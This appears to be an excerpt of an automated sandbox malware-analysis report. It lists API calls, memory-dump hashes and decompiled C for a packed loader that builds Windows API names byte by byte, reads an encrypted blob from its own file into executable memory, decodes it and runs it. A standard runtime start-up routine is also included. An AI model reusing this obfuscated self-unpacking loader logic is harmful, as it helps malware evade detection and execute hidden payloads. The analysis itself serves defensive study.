                                                                                                                                                    0x004049e8
                                                                                                                                                    0x004049f9
                                                                                                                                                    0x00404a1a
                                                                                                                                                    0x00404a27
                                                                                                                                                    0x00404a3d
                                                                                                                                                    0x00404a58
                                                                                                                                                    0x00404a7f
                                                                                                                                                    0x00404a8b
                                                                                                                                                    0x00404aaa
                                                                                                                                                    0x00404ac6
                                                                                                                                                    0x00404af2
                                                                                                                                                    0x00404afe
                                                                                                                                                    0x00404b0b
                                                                                                                                                    0x00404b21
                                                                                                                                                    0x00404b42
                                                                                                                                                    0x00404b5a
                                                                                                                                                    0x00404b71
                                                                                                                                                    0x00404bac
                                                                                                                                                    0x00404bb1
                                                                                                                                                    0x00404bc2
                                                                                                                                                    0x00404bc2
                                                                                                                                                    0x004044ba
                                                                                                                                                    0x004044bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004044c4
                                                                                                                                                    0x004044c6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004044c6
                                                                                                                                                    0x004044bc
                                                                                                                                                    0x00404460
                                                                                                                                                    0x004043e5
                                                                                                                                                    0x004043e7
                                                                                                                                                    0x004043fd
                                                                                                                                                    0x00404403
                                                                                                                                                    0x00404407
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040440b
                                                                                                                                                    0x0040440d
                                                                                                                                                    0x0040440d
                                                                                                                                                    0x00404419
                                                                                                                                                    0x0040441b
                                                                                                                                                    0x0040441e
                                                                                                                                                    0x0040441f
                                                                                                                                                    0x00404428
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040442a
                                                                                                                                                    0x0040442a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040442a
                                                                                                                                                    0x00404428
                                                                                                                                                    0x00404486
                                                                                                                                                    0x0040448a
                                                                                                                                                    0x0040448e
                                                                                                                                                    0x0040448e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040448e
                                                                                                                                                    0x0040439d
                                                                                                                                                    0x004043a3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004043a3
                                                                                                                                                    0x004042b4
                                                                                                                                                    0x004042b8
                                                                                                                                                    0x004042c1
                                                                                                                                                    0x004042db
                                                                                                                                                    0x004042e1
                                                                                                                                                    0x004042e9
                                                                                                                                                    0x004042f4
                                                                                                                                                    0x004042f4
                                                                                                                                                    0x004042f4
                                                                                                                                                    0x004042fb
                                                                                                                                                    0x00404304
                                                                                                                                                    0x00404308
                                                                                                                                                    0x00404310
                                                                                                                                                    0x00404319
                                                                                                                                                    0x0040431d
                                                                                                                                                    0x00404322
                                                                                                                                                    0x0040432a
                                                                                                                                                    0x00404332
                                                                                                                                                    0x0040438c
                                                                                                                                                    0x00404391
                                                                                                                                                    0x00404334
                                                                                                                                                    0x00404335
                                                                                                                                                    0x0040433c
                                                                                                                                                    0x00404346
                                                                                                                                                    0x0040434e
                                                                                                                                                    0x00404358
                                                                                                                                                    0x00404359
                                                                                                                                                    0x0040435b
                                                                                                                                                    0x0040436f
                                                                                                                                                    0x00404373
                                                                                                                                                    0x00404373
                                                                                                                                                    0x0040436f
                                                                                                                                                    0x00404378
                                                                                                                                                    0x00404385
                                                                                                                                                    0x00404385
                                                                                                                                                    0x00404332
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004042e1
                                                                                                                                                    0x004042ce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004042d4
                                                                                                                                                    0x004042d7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004042d7
                                                                                                                                                    0x004041fe
                                                                                                                                                    0x00404202
                                                                                                                                                    0x00404206
                                                                                                                                                    0x0040420c
                                                                                                                                                    0x00404214
                                                                                                                                                    0x0040421c
                                                                                                                                                    0x00404222
                                                                                                                                                    0x00404224
                                                                                                                                                    0x00404226
                                                                                                                                                    0x00404229
                                                                                                                                                    0x00404231
                                                                                                                                                    0x00404237
                                                                                                                                                    0x00404237
                                                                                                                                                    0x00404243
                                                                                                                                                    0x00404250
                                                                                                                                                    0x00404250
                                                                                                                                                    0x00404257
                                                                                                                                                    0x0040425d
                                                                                                                                                    0x00404267
                                                                                                                                                    0x0040426a
                                                                                                                                                    0x0040426c
                                                                                                                                                    0x0040426d
                                                                                                                                                    0x00404276
                                                                                                                                                    0x00404279
                                                                                                                                                    0x0040427b
                                                                                                                                                    0x0040427c
                                                                                                                                                    0x00404281
                                                                                                                                                    0x00404282
                                                                                                                                                    0x0040428e
                                                                                                                                                    0x00404292
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00404298
                                                                                                                                                    0x0040429e
                                                                                                                                                    0x004042a0
                                                                                                                                                    0x004042a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004042a6
                                                                                                                                                    0x00404292
                                                                                                                                                    0x004041b9
                                                                                                                                                    0x004041bf
                                                                                                                                                    0x004041c4
                                                                                                                                                    0x004041d3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004041d9
                                                                                                                                                    0x004041e1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004041e1

                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32 ref: 004041CB
                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 004041DB
                                                                                                                                                    • GetDlgItem.USER32 ref: 004041F8
                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 00404206
                                                                                                                                                    • GetDlgItem.USER32 ref: 0040421C
                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0,?,000003F0,?,000003FB), ref: 00404231
                                                                                                                                                    • SetWindowTextA.USER32(00000000), ref: 0040425D
                                                                                                                                                    • SHBrowseForFolderA.SHELL32(?), ref: 0040432A
                                                                                                                                                    • lstrcmpiA.KERNEL32(0044CFC0,00435D28,00000000,?), ref: 00404367
                                                                                                                                                    • lstrcatA.KERNEL32(?,0044CFC0), ref: 00404373
                                                                                                                                                    • SetDlgItemTextA.USER32 ref: 00404385
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404335
                                                                                                                                                      • Part of subcall function 00406CD7: GetDlgItemTextA.USER32 ref: 00406CEA
                                                                                                                                                      • Part of subcall function 00406F40: CharPrevA.USER32(?,?), ref: 00406FBA
                                                                                                                                                      • Part of subcall function 0040595C: lstrcatA.KERNEL32(00000000,00000000,0044C3A0,00480000,install.log,00402E8F), ref: 00405977
                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(0043FD48,?,?,?,?,0043FD48,0043FD48,?,00000001,0043FD48,?,?,000003FB), ref: 00404458
                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000400), ref: 00404475
                                                                                                                                                      • Part of subcall function 0040603B: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,0040329D,00000022,00000000,?,?), ref: 00406100
                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004049C2
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000004D,00003000,00000004), ref: 004049E5
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,0000004D,?,00000000), ref: 00404A1A
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00404A27
                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00404A79
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00404AA7
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00404AF2
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00404B1E
                                                                                                                                                    • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00404BB9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Item$File$AllocTextVirtual$CreateFreeReadWindowlstrcat$AsyncBrowseButtonChangeCharCheckedCloseDiskExitFindFolderNotificationPrevProcessShowSpaceStateTaskUserVersionlstrcmpi
                                                                                                                                                    • String ID: (]C$A$CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                    • API String ID: 167786756-2939551942
                                                                                                                                                    • Opcode ID: d1911917e01444930efb414154028e14672c9858a40fda6be0f00754cc4ea70b
                                                                                                                                                    • Instruction ID: 59d179022bd9b5ddb97fe4668c1431304098a4021040c659f1f496451bd48b3e
                                                                                                                                                    • Opcode Fuzzy Hash: d1911917e01444930efb414154028e14672c9858a40fda6be0f00754cc4ea70b
                                                                                                                                                    • Instruction Fuzzy Hash: 9A528371D08398DEEB21DB64CC48BDEBBB46F55704F0440D9E6487A282CBBA5B84CF65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004044D6, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 369filememoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 45%
                                                                                                                                                    			E004044D6() {
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				void* _v332;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				short _v363;
				char _v367;
				char _v371;
				char _v375;
				char _v379;
				char _v380;
				void* _v384;
				void* _v388;
				char _v392;
				void* _v396;
				void* _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				long _v416;
				void* _v420;
				void* _v424;
				void* _v428;
				void* _v432;
				intOrPtr _v436;
				void* _v440;
				void* _v444;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				intOrPtr _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				void* _v480;
				void* _v484;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				void* _v504;
				long _v508;
				void* _t299;
				void* _t301;
				void* _t302;

				_v440 = 0;
				_v416 = 0;
				_v380 = 0;
				_v379 = 0;
				_v375 = 0;
				_v371 = 0;
				_v367 = 0;
				_v363 = 0;
				_v361 = 0;
				_v500 = 0x56;
				_v499 = 0x69;
				_v498 = 0x72;
				_v497 = 0x74;
				_v496 = 0x75;
				_v495 = 0x61;
				_v494 = 0x6c;
				_v493 = 0x41;
				_v492 = 0x6c;
				asm("invalid");
				asm("insb");
				_v491 = 0x6c;
				_v490 = 0x6f;
				_v489 = 0x63;
				_v488 = 0;
				_v460 = 0x56;
				_v459 = 0x69;
				_v458 = 0x72;
				_v457 = 0x74;
				_v456 = 0x75;
				_v455 = 0x61;
				_v454 = 0x6c;
				_v453 = 0x50;
				_v452 = 0x72;
				_v451 = 0x6f;
				_v450 = 0x74;
				_v449 = 0x65;
				_v448 = 0x63;
				_v447 = 0x74;
				_v446 = 0;
				_v24 = 0x47;
				_v23 = 0x65;
				_v22 = 0x74;
				_v21 = 0x4d;
				_v20 = 0x6f;
				_v19 = 0x64;
				_v18 = 0x75;
				_v17 = 0x6c;
				_v16 = 0x65;
				_v15 = 0x46;
				_v14 = 0x69;
				_v13 = 0x6c;
				_v12 = 0x65;
				_v11 = 0x4e;
				_v10 = 0x61;
				_v9 = 0x6d;
				_v8 = 0x65;
				_v7 = 0x41;
				_v6 = 0;
				_v476 = 0x43;
				_v475 = 0x72;
				_v474 = 0x65;
				_v473 = 0x61;
				_v472 = 0x74;
				_v471 = 0x65;
				_v470 = 0x46;
				_v469 = 0x69;
				_v468 = 0x6c;
				_v467 = 0x65;
				_v466 = 0x41;
				_v465 = 0;
				_v360 = 0x47;
				_v359 = 0x65;
				_v358 = 0x74;
				_v357 = 0x46;
				_v356 = 0x69;
				_v355 = 0x6c;
				_v354 = 0x65;
				_v353 = 0x53;
				_v352 = 0x69;
				_v351 = 0x7a;
				_v350 = 0x65;
				_v349 = 0;
				_v36 = 0x52;
				_v35 = 0x65;
				_v34 = 0x61;
				_v33 = 0x64;
				_v32 = 0x46;
				_v31 = 0x69;
				_v30 = 0x6c;
				_v29 = 0x65;
				_v28 = 0;
				_v328 = 0x43;
				_v327 = 0x6c;
				_v326 = 0x6f;
				_v325 = 0x73;
				_v324 = 0x65;
				_v323 = 0x48;
				_v322 = 0x61;
				_v321 = 0x6e;
				_v320 = 0x64;
				_v319 = 0x6c;
				_v318 = 0x65;
				_v317 = 0;
				_v348 = 0x47;
				_v347 = 0x65;
				_v346 = 0x74;
				_v345 = 0x4c;
				_v344 = 0x61;
				_v343 = 0x73;
				_v342 = 0x74;
				_v341 = 0x45;
				_v340 = 0x72;
				_v339 = 0x72;
				_v338 = 0x6f;
				_v337 = 0x72;
				_v336 = 0;
				_v412 = 0x45;
				_v411 = 0x78;
				_v410 = 0x69;
				_v409 = 0x74;
				_v408 = 0x50;
				_v407 = 0x72;
				_v406 = 0x6f;
				_v405 = 0x63;
				_v404 = 0x65;
				_v403 = 0x73;
				_v402 = 0x73;
				_v401 = 0;
				_v444 = 0;
				_v484 = 0;
				_v388 = 0;
				_v48 = 0;
				_v332 = 0;
				_v44 = 0;
				_v384 = 0;
				_v480 = 0;
				_v432 = 0;
				_v40 = 0;
				_v400 = 0;
				_v428 = 0;
				E00404BC6(_t302);
				_v440 = E00404C06( &_v444,  &_v484,  &_v388);
				_t143 =  &_v500; // 0x56
				_v48 = _v388(_v444, _t143);
				_t147 =  &_v460; // 0x56
				_v332 = _v388(_v444, _t147);
				_t151 =  &_v24; // 0x47
				_v44 = _v388(_v444, _t151);
				_t155 =  &_v476; // 0x43
				_v384 = _v388(_v444, _t155);
				_t159 =  &_v360; // 0x47
				_v480 = _v388(_v444, _t159);
				_t163 =  &_v36; // 0x52
				_v432 = _v388(_v444, _t163);
				_t167 =  &_v328; // 0x43
				_v40 = _v388(_v444, _t167);
				_t171 =  &_v348; // 0x47
				_v400 = _v388(_v444, _t171);
				_t175 =  &_v412; // 0x45
				_v428 = _v388(_v444, _t175);
				E00405156( &_v316,  &_v316, 0, 0x104);
				E00405156( &_v316,  &_v380, 0, 0x14);
				_v44(0,  &_v316, 0x104);
				_v420 = CreateFileA( &_v316, 0x80000000, 3, 0, 3, 0x80, 0);
				_v464 = _v400();
				_v424 = VirtualAlloc(0, 0x4d, 0x3000, 4);
				E00405156( &_v316, _v424, 0, 0x4d);
				ReadFile(_v420, _v424, 0x4d,  &_v508, 0);
				FindCloseChangeNotification(_v420);
				E00405196( &_v392, _v424 + 0x45, 4);
				E00405196( &_v416, _v424 + 0x49, 4);
				_v420 = CreateFileA( &_v316, 0x80000000, 3, 0, 3, 0x80, 0);
				_v464 = _v400();
				_v396 = VirtualAlloc(0, _v392 + _v416, 0x3000, 4);
				E00405156(_v392 + _v416, _v396, 0, _v392 + _v416);
				ReadFile(_v420, _v396, _v392 + _v416,  &_v508, 0);
				_v464 = _v400();
				_v40(_v420);
				_v504 = VirtualAlloc(0, _v416, 0x3000, 0x40);
				E00405196(_v504, _v396 + _v392, _v416);
				E00405316(_v392,  &_v380, 0xa);
				_v436 = E00405356(_v392,  &_v380);
				_t299 = E00404EC6(_t301, _v504, _v416,  &_v380, _v436, _v484, _v388, _v48, _v332); // executed
				_v440 = _t299;
				return _v428(0);
			}

























































































































































                                                                                                                                                    0x004044df
                                                                                                                                                    0x004044e9
                                                                                                                                                    0x004044f3
                                                                                                                                                    0x004044fc
                                                                                                                                                    0x00404502
                                                                                                                                                    0x00404508
                                                                                                                                                    0x0040450e
                                                                                                                                                    0x00404514
                                                                                                                                                    0x0040451b
                                                                                                                                                    0x00404521
                                                                                                                                                    0x00404528
                                                                                                                                                    0x0040452f
                                                                                                                                                    0x00404536
                                                                                                                                                    0x0040453d
                                                                                                                                                    0x00404544
                                                                                                                                                    0x0040454b
                                                                                                                                                    0x00404552
                                                                                                                                                    0x00404559
                                                                                                                                                    0x0040455d
                                                                                                                                                    0x0040455f
                                                                                                                                                    0x00404560
                                                                                                                                                    0x00404567
                                                                                                                                                    0x0040456e
                                                                                                                                                    0x00404575
                                                                                                                                                    0x0040457c
                                                                                                                                                    0x00404583
                                                                                                                                                    0x0040458a
                                                                                                                                                    0x00404591
                                                                                                                                                    0x00404598
                                                                                                                                                    0x0040459f
                                                                                                                                                    0x004045a6
                                                                                                                                                    0x004045ad
                                                                                                                                                    0x004045b4
                                                                                                                                                    0x004045bb
                                                                                                                                                    0x004045c2
                                                                                                                                                    0x004045c9
                                                                                                                                                    0x004045d0
                                                                                                                                                    0x004045d7
                                                                                                                                                    0x004045de
                                                                                                                                                    0x004045e5
                                                                                                                                                    0x004045e9
                                                                                                                                                    0x004045ed
                                                                                                                                                    0x004045f1
                                                                                                                                                    0x004045f5
                                                                                                                                                    0x004045f9
                                                                                                                                                    0x004045fd
                                                                                                                                                    0x00404601
                                                                                                                                                    0x00404605
                                                                                                                                                    0x00404609
                                                                                                                                                    0x0040460d
                                                                                                                                                    0x00404611
                                                                                                                                                    0x00404615
                                                                                                                                                    0x00404619
                                                                                                                                                    0x0040461d
                                                                                                                                                    0x00404621
                                                                                                                                                    0x00404625
                                                                                                                                                    0x00404629
                                                                                                                                                    0x0040462d
                                                                                                                                                    0x00404631
                                                                                                                                                    0x00404638
                                                                                                                                                    0x0040463f
                                                                                                                                                    0x00404646
                                                                                                                                                    0x0040464d
                                                                                                                                                    0x00404654
                                                                                                                                                    0x0040465b
                                                                                                                                                    0x00404662
                                                                                                                                                    0x00404669
                                                                                                                                                    0x00404670
                                                                                                                                                    0x00404677
                                                                                                                                                    0x0040467e
                                                                                                                                                    0x00404685
                                                                                                                                                    0x0040468c
                                                                                                                                                    0x00404693
                                                                                                                                                    0x0040469a
                                                                                                                                                    0x004046a1
                                                                                                                                                    0x004046a8
                                                                                                                                                    0x004046af
                                                                                                                                                    0x004046b6
                                                                                                                                                    0x004046bd
                                                                                                                                                    0x004046c4
                                                                                                                                                    0x004046cb
                                                                                                                                                    0x004046d2
                                                                                                                                                    0x004046d9
                                                                                                                                                    0x004046dd
                                                                                                                                                    0x004046e1
                                                                                                                                                    0x004046e5
                                                                                                                                                    0x004046e9
                                                                                                                                                    0x004046ed
                                                                                                                                                    0x004046f1
                                                                                                                                                    0x004046f5
                                                                                                                                                    0x004046f9
                                                                                                                                                    0x004046fd
                                                                                                                                                    0x00404704
                                                                                                                                                    0x0040470b
                                                                                                                                                    0x00404712
                                                                                                                                                    0x00404719
                                                                                                                                                    0x00404720
                                                                                                                                                    0x00404727
                                                                                                                                                    0x0040472e
                                                                                                                                                    0x00404735
                                                                                                                                                    0x0040473c
                                                                                                                                                    0x00404743
                                                                                                                                                    0x0040474a
                                                                                                                                                    0x00404751
                                                                                                                                                    0x00404758
                                                                                                                                                    0x0040475f
                                                                                                                                                    0x00404766
                                                                                                                                                    0x0040476d
                                                                                                                                                    0x00404774
                                                                                                                                                    0x0040477b
                                                                                                                                                    0x00404782
                                                                                                                                                    0x00404789
                                                                                                                                                    0x00404790
                                                                                                                                                    0x00404797
                                                                                                                                                    0x0040479e
                                                                                                                                                    0x004047a5
                                                                                                                                                    0x004047ac
                                                                                                                                                    0x004047b3
                                                                                                                                                    0x004047ba
                                                                                                                                                    0x004047c1
                                                                                                                                                    0x004047c8
                                                                                                                                                    0x004047cf
                                                                                                                                                    0x004047d6
                                                                                                                                                    0x004047dd
                                                                                                                                                    0x004047e4
                                                                                                                                                    0x004047eb
                                                                                                                                                    0x004047f2
                                                                                                                                                    0x004047f9
                                                                                                                                                    0x00404800
                                                                                                                                                    0x0040480a
                                                                                                                                                    0x00404814
                                                                                                                                                    0x0040481e
                                                                                                                                                    0x00404825
                                                                                                                                                    0x0040482f
                                                                                                                                                    0x00404836
                                                                                                                                                    0x00404840
                                                                                                                                                    0x0040484a
                                                                                                                                                    0x00404854
                                                                                                                                                    0x0040485b
                                                                                                                                                    0x00404865
                                                                                                                                                    0x0040486f
                                                                                                                                                    0x0040488e
                                                                                                                                                    0x00404894
                                                                                                                                                    0x004048a8
                                                                                                                                                    0x004048ab
                                                                                                                                                    0x004048bf
                                                                                                                                                    0x004048c5
                                                                                                                                                    0x004048d6
                                                                                                                                                    0x004048d9
                                                                                                                                                    0x004048ed
                                                                                                                                                    0x004048f3
                                                                                                                                                    0x00404907
                                                                                                                                                    0x0040490d
                                                                                                                                                    0x0040491e
                                                                                                                                                    0x00404924
                                                                                                                                                    0x00404938
                                                                                                                                                    0x0040493b
                                                                                                                                                    0x0040494f
                                                                                                                                                    0x00404955
                                                                                                                                                    0x00404969
                                                                                                                                                    0x0040497d
                                                                                                                                                    0x00404990
                                                                                                                                                    0x004049a6
                                                                                                                                                    0x004049c8
                                                                                                                                                    0x004049d4
                                                                                                                                                    0x004049e8
                                                                                                                                                    0x004049f9
                                                                                                                                                    0x00404a1a
                                                                                                                                                    0x00404a27
                                                                                                                                                    0x00404a3d
                                                                                                                                                    0x00404a58
                                                                                                                                                    0x00404a7f
                                                                                                                                                    0x00404a8b
                                                                                                                                                    0x00404aaa
                                                                                                                                                    0x00404ac6
                                                                                                                                                    0x00404af2
                                                                                                                                                    0x00404afe
                                                                                                                                                    0x00404b0b
                                                                                                                                                    0x00404b21
                                                                                                                                                    0x00404b42
                                                                                                                                                    0x00404b5a
                                                                                                                                                    0x00404b71
                                                                                                                                                    0x00404bac
                                                                                                                                                    0x00404bb1
                                                                                                                                                    0x00404bc2

                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 004049C2
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,0000004D,00003000,00000004), ref: 004049E5
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,0000004D,?,00000000), ref: 00404A1A
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00404A27
                                                                                                                                                    • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00404A79
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00404AA7
                                                                                                                                                    • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00404AF2
                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00404B1E
                                                                                                                                                    • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00404BB9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000004.00000002.627045125.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000004.00000002.627003150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627030438.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627057789.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627075353.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627086120.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000004.00000002.627109881.0000000000498000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AllocVirtual$CreateRead$ChangeCloseExitFindNotificationProcessUser
                                                                                                                                                    • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                    • API String ID: 1509138972-3199432782
                                                                                                                                                    • Opcode ID: eb7513cdf9d57d636757982994087c360670b033f3571f6b3922ade153339689
                                                                                                                                                    • Instruction ID: b80cae16ce917f7fd16ecc633cd4f7e9139d345083a944645a7433e63e296364
                                                                                                                                                    • Opcode Fuzzy Hash: eb7513cdf9d57d636757982994087c360670b033f3571f6b3922ade153339689
                                                                                                                                                    • Instruction Fuzzy Hash: 4622FE71D082A8DAEB61CB64CC58BDEBFB56F16704F0440C9D54C7A281D7BA1B88CF66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 1000E90E, Relevance: 25.6, APIs: 17, Instructions: 90memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                    			E1000E90E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033447c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10334484 = (_t20 << 8) + _t39;
						 *0x10334488 = _t20;
						 *0x1033448c = _t39;
						 *0x10334480 = _t47;
						_t21 = E1000F7BF(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E100133E0(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E10015081();
								 *0x10337f64 = GetCommandLineA();
								 *0x103342fc = E10014F4C(); // executed
								_t27 = E10014994(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014E93(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014BD4();
										goto L10;
									} else {
										_t32 = E10014C20(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E1001167A(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103342f8 =  *0x103342f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E100130CA();
									goto L8;
								}
							} else {
								L8:
								E1000F819();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}



















                                                                                                                                                    0x1000e90e
                                                                                                                                                    0x1000e925
                                                                                                                                                    0x1000e929
                                                                                                                                                    0x1000e933
                                                                                                                                                    0x1000e935
                                                                                                                                                    0x1000e93b
                                                                                                                                                    0x1000e93d
                                                                                                                                                    0x1000e93e
                                                                                                                                                    0x1000e940
                                                                                                                                                    0x1000e953
                                                                                                                                                    0x1000e959
                                                                                                                                                    0x1000e95f
                                                                                                                                                    0x1000e962
                                                                                                                                                    0x1000e96b
                                                                                                                                                    0x1000e971
                                                                                                                                                    0x1000e974
                                                                                                                                                    0x1000e977
                                                                                                                                                    0x1000e979
                                                                                                                                                    0x1000e979
                                                                                                                                                    0x1000e979
                                                                                                                                                    0x1000e97f
                                                                                                                                                    0x1000e982
                                                                                                                                                    0x1000e987
                                                                                                                                                    0x1000e98f
